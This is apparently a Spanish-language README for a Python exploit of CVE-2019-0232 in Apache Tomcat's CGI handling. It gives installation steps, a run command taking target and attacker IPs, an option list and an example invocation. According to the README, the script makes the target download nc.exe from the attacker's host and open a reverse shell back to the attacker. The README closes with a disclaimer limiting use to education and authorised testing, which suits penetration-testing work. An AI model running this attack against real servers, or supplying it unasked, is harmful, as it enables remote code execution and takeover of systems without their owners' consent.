
Exploit en Python para CVE-2019-0232 dirigido a vulnerabilidades CGI de Apache Tomcat con conexión automatizada de shell inversa y parámetros personalizables de objetivo/atacante.
Un script de Python diseñado para explotar vulnerabilidades CGI en servidores Apache Tomcat mediante la ejecución de una conexión de shell inversa.

requestsgit clone <url-del-repositorio>
cd <directorio-del-repositorio>
pip install requests
python3 tomcat_cgi_exploit.py -t <IP_OBJETIVO> -i <IP_ATACANTE> -ncp <PUERTO_SHELL_INVERSO>
-t, --target: Dirección IP del objetivo con Apache Tomcat-i, --ip: Dirección IP del atacante que aloja nc.exe-ncp, --nc-port: Puerto para la conexión de shell inverso-p, --port: Puerto del objetivo (por defecto: 8080)-sp, --server-port: Puerto del servidor para alojar nc.exe (por defecto: 80)-cgi, --cgi-script: Nombre del script CGI a explotar (por defecto: cmd.bat)python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444
Esta herramienta se proporciona únicamente para propósitos educativos y pruebas de penetración autorizadas. El autor y los colaboradores no son responsables de ningún mal uso o daño causado por este script. Siempre obtenga autorización adecuada antes de probar cualquier sistema.